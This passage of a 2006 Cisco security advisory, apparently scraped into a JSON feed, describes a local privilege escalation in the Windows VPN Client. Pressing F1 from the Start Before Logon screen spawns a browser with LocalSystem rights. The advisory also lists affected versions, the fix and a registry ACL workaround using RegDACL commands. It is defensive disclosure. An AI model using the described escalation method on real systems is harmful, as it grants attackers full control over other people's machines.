Vulnerable\r\n+--------------------------------\r\n\r\nAll other versions of Cisco VPN Client that are based on an operating\r\nsystem other than Microsoft Windows are not affected by this\r\nvulnerability. 
These include:\r\n\r\n * Any version of the Cisco VPN Client for Solaris\r\n * Any version of the Cisco VPN Client for Linux\r\n * Any version of the Cisco VPN Client for Macintosh (MacOS X and\r\n MacOS Classic)\r\n\r\nCisco VPN Client for Windows version 4.8.01.x and later are not\r\naffected by this vulnerability.\r\n\r\nIn addition, due to a regression, version 4.7.00.0533 of the Cisco VPN\r\nClient for Windows is not affected, even though other 4.7.x are\r\naffected. Users running version 4.7.00.0533 of the Cisco VPN Client for\r\nWindows do not need to upgrade to version 4.8.01 or later to be\r\nprotected from this vulnerability.\r\n\r\nNo other Cisco products are currently known to be affected by this\r\nvulnerability.\r\n\r\nDetermining the Cisco VPN Client Version\r\n+---------------------------------------\r\n\r\nIn order to determine which version of the Cisco VPN Client is running\r\non the Microsoft Windows machine, open the Cisco VPN Client graphical\r\nuser interface by selecting "Programs->Cisco Systems VPN Client->VPN\r\nClient" from the Start menu and then select the option "About VPN\r\nClient..." from the "Help" menu. This will display a dialog box\r\ncontaining text similar to "Cisco Systems VPN Client Version 4.0.5(Rel)\r\n". 
Please note that the location of the "Cisco Systems VPN Client"\r\nfolder mentioned above in Windows' Start menu is where the program is\r\ninstalled by default; your system administrator may have chosen to use\r\na different name or location.\r\n\r\nDetails\r\n=======\r\n\r\nThe Cisco VPN Client is a software solution for the Sun Solaris, Apple\r\nMacOS Classic and MacOS X, Linux and Microsoft Windows operating\r\nsystems that allows users running these operating systems to establish\r\nIPSec VPN tunnels to Cisco VPN-capable devices like Cisco IOS routers,\r\nthe PIX Security Appliance, the VPN 3000 Series Concentrators, and the\r\nASA 5500 Series Adaptive Security Appliances.\r\n\r\nA vulnerability in the Cisco VPN Client for Windows graphical user\r\ninterface (GUI), also known as the "VPN client dialer", can be\r\nexploited to elevate user privileges and obtain LocalSystem-equivalent\r\nprivileges.\r\n\r\nThe vulnerability occurs when the Start Before Logon (SBL) feature is\r\nenabled on the Cisco VPN Client. This feature can be enabled by\r\nunprivileged users from the Cisco VPN Client GUI. Once this feature is\r\nenabled, the user will see a Cisco VPN Client GUI in the Windows logon\r\nscreen. When the user accesses Cisco VPN Client help in this GUI with\r\nthe F1 key, the Cisco VPN Client spawns a web browser process. Since no\r\nuser has logged in yet, the Cisco VPN Client is running with\r\nLocalSystem privileges, and therefore so will the spawned web browser\r\nprocess. 
After the logon sequence is completed, the user has a web\r\nbrowser window on the desktop, running with LocalSystem privileges.\r\n\r\nAdditional information on the SBL feature can be found at:\r\n\r\nhttp://www.cisco.com/univercd/cc/td/doc/product/vpn/client/4_6/ugwin/vc7.htm#wp1301567\r\n\r\nThis issue is not related to any known issues in Microsoft Windows\r\nitself.\r\n\r\nThis vulnerability is documented by Cisco Bug ID CSCsd79265 \r\n\r\nFor information about local system level privileges, please refer to:\r\n\r\n * The LocalSystem Account\r\n http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dllproc/base/localsystem_account.asp \r\n\r\nImpact\r\n======\r\n\r\nSuccessful exploitation of the vulnerability may result in a normal\r\nuser or attacker gaining full control of the system, evading any\r\ncontrols put in place by the Windows system administrator.\r\n\r\nSoftware Versions and Fixes\r\n===========================\r\n\r\nWhen considering software upgrades, also consult \r\nhttp://www.cisco.com/go/psirt and any subsequent advisories to \r\ndetermine exposure and a complete upgrade solution.\r\n\r\nIn all cases, customers should exercise caution to be certain the\r\ndevices to be upgraded contain sufficient memory and that current\r\nhardware and software configurations will continue to be supported\r\nproperly by the new release. 
If the information is not clear, contact
the Cisco Technical Assistance Center ("TAC") or your contracted
maintenance provider for assistance.

This vulnerability is fixed in version 4.8.01.0300 of the Cisco VPN
Client for Windows, which can be downloaded from the following
location:

http://www.cisco.com/pcgi-bin/tablebuild.pl/windows

For information on how to upgrade the Cisco VPN Client, including
automatic upgrades, please refer to the following chapter of the VPN
Client Administrator Guide: Updating VPN Client Software.

Workarounds
===========

A workaround for this vulnerability is to prevent the LocalSystem
account (also known as "SYSTEM") from launching the application
associated with files with the ".html" extension. After applying this
workaround, pressing the F1 key on the Cisco VPN Client GUI in the
Windows logon screen has no effect.

This can be accomplished by attaching an Access Control List (ACL)
entry to the Windows registry keys
HKEY_LOCAL_MACHINE\Software\Classes\.html and HKEY_CLASSES_ROOT\.html
so that the NT-AUTHORITY\SYSTEM account is denied all access to that key.

The following example uses the tool RegDACL (Copyright(c) 1999-2001
Frank Heyne Software), available from
http://www.heysoft.de/Frames/f_sw_rt_en.htm , to apply the Windows
registry ACL mentioned above:

    C:\>regdacl HKLM\Software\Classes\.html /DGS:F

    RegDACL 5.1 - Permissions Manager for Registry keys for Windows NT 4 and above
    Copyright (c) 1999-2001 Frank Heyne Software (http://www.heysoft.de)
    This program is Freeware, use it on your own risk!


    Denying F access for predefined group "System"
     - adding new ACCESS DENY entry
     - removing existing entry


    C:\>regdacl HKCR\.html /DGS:F

    RegDACL 5.1 - Permissions Manager for Registry keys for Windows NT 4 and above
    Copyright (c) 1999-2001 Frank Heyne Software (http://www.heysoft.de)
    This program is Freeware, use it on your own risk!


    Denying F access for predefined group "System"
     - adding new ACCESS DENY entry
     - removing existing entry


    C:\>


Another tool that can be used to accomplish the same is the Regini.exe
utility that comes with several versions of the Windows Resource Kit.
For more information on how to use Regini.exe, please visit the
following Microsoft Knowledge Base article:

  * How to Use Regini.exe to Set Permissions on Registry Keys
    http://support.microsoft.com/?kbid=237607

Manually editing the Windows registry with RegEdit.exe will also work,
but this method does not scale when the operation needs to be performed
on a large number of machines.

While Cisco has tested the above workaround in Cisco's test
environment, the effectiveness and impact of any workaround is
dependent on each customer's particular environment. Customers electing
to apply any workaround (rather than upgrading to an updated version of
the Cisco VPN Client) are encouraged to test such workaround thoroughly
to ensure, among other things, that it does not negatively impact any
other applications that may rely on applicable functionality (e.g., the
ability of the LocalSystem account to launch HTML files from any
application).

Obtaining Fixed Software
========================

Cisco has made free software available to address this vulnerability
for affected customers. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature sets they
have purchased.
By installing, downloading, accessing or otherwise
using such software upgrades, customers agree to be bound by the terms
of Cisco's software license terms found at
http://www.cisco.com/public/sw-license-agreement.html, or as otherwise
set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.

Do not contact either "psirt@cisco.com" or "security-alert@cisco.com"
for software upgrades.

Customers with Service Contracts
+-------------------------------

Customers with contracts should obtain upgraded software through their
regular update channels. For most customers, this means that upgrades
should be obtained through the Software Center on Cisco's worldwide
website at http://www.cisco.com.

Customers using Third-party Support Organizations
+------------------------------------------------

Customers whose Cisco products are provided or maintained through prior
or existing agreement with third-party support organizations such as
Cisco Partners, authorized resellers, or service providers should
contact that support organization for guidance and assistance with the
appropriate course of action in regards to this advisory.

The effectiveness of any workaround or fix is dependent on specific
customer situations such as product mix, network topology, traffic
behavior, and organizational mission.
Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.

Customers without Service Contracts
+----------------------------------

Customers who purchase direct from Cisco but who do not hold a Cisco
service contract and customers who purchase through third-party vendors
but are unsuccessful at obtaining fixed software through their point of
sale should get their upgrades by contacting the Cisco Technical
Assistance Center (TAC). TAC contacts are as follows.

  * +1 800 553 2447 (toll free from within North America)
  * +1 408 526 7209 (toll call from anywhere in the world)
  * e-mail: tac@cisco.com

Have your product serial number available and give the URL of this
notice as evidence of your entitlement to a free upgrade. Free upgrades
for non-contract customers must be requested through the TAC.

Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml
for additional TAC contact information, including special localized
telephone numbers and instructions and e-mail addresses for use in
various languages.

Exploitation and Public Announcements
=====================================

The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.

This vulnerability was independently reported to Cisco by Andrew
Christensen from FortConsult and by Johan Ronkainen.
Cisco would like
to thank them for working with us towards coordinated disclosure of
this vulnerability.

Applying an ACL to the HKCR\.html registry key in order to prevent the
SYSTEM account from being able to launch a web browser was suggested to
Cisco Systems by Johan Ronkainen.

FortConsult's advisory is available at the following location:

http://www.fortconsult.net/images/pdf/cisco_advisory_may2006.pdf

Status of This Notice: FINAL
============================

THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT
YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.

A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an uncontrolled
copy, and may lack important information or contain factual errors.

Distribution
============

This advisory is posted on Cisco's worldwide website at
http://www.cisco.com/warp/public/707/cisco-sa-20060524-vpnclient.shtml.

In addition to worldwide web posting, a text version of this notice is
clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.

  * cust-security-announce@cisco.com
  * first-teams@first.org
  * bugtraq@securityfocus.com
  * vulnwatch@vulnwatch.org
  * cisco@spot.colorado.edu
  * cisco-nsp@puck.nether.net
  * full-disclosure@lists.grok.org.uk
  * comp.dcom.sys.cisco@newsgate.cisco.com

Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on mailing
lists or newsgroups.
Users concerned about this problem are encouraged
to check the above URL for any updates.

Revision History
================

+-------------------------------------------------------------------------+
|              |              | * Added full details about the            |
|              |              |   vulnerability (see the Details          |
|              |              |   section.)                               |
|              |              | * Provided possible workarounds (see      |
| Revision 2.0 | 2006-July-27 |   the Workarounds section).               |
|              |              | * Added a link to FortConsult's           |
|              |              |   advisory                                |
|              |              | * Changed "Status of this Notice" from    |
|              |              |   INTERIM to FINAL.                       |
|--------------+--------------+-------------------------------------------|
|              |              |                                           |
| Revision 1.0 | 2006-May-24  | Initial public release.                   |
|              |              |                                           |
+-------------------------------------------------------------------------+


Cisco Security Procedures

Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and registering
to receive security information from Cisco, is available on Cisco's
worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding Cisco security
notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt.

- -----------------------------------------------------------------------

All contents are Copyright 1992-2006 Cisco Systems, Inc. All rights reserved.

- -----------------------------------------------------------------------

Updated: Jul 27, 2006 Document ID: 70332

- -----------------------------------------------------------------------
", "modified": "2006-07-28T00:00:00", "published": "2006-07-28T00:00:00", "id": "SECURITYVULNS:DOC:13663", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13663", "title": "[Full-disclosure] Cisco Security Advisory: Windows VPN Client Local Privilege Escalation Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:21", "bulletinFamily": "software", "description": "Privilege escalation with help subsystem.", "modified": "2006-07-28T00:00:00", "published": "2006-07-28T00:00:00", "id": "SECURITYVULNS:VULN:6183", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:6183", "title": "Cisco VPN client for Windows privilege escalation", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}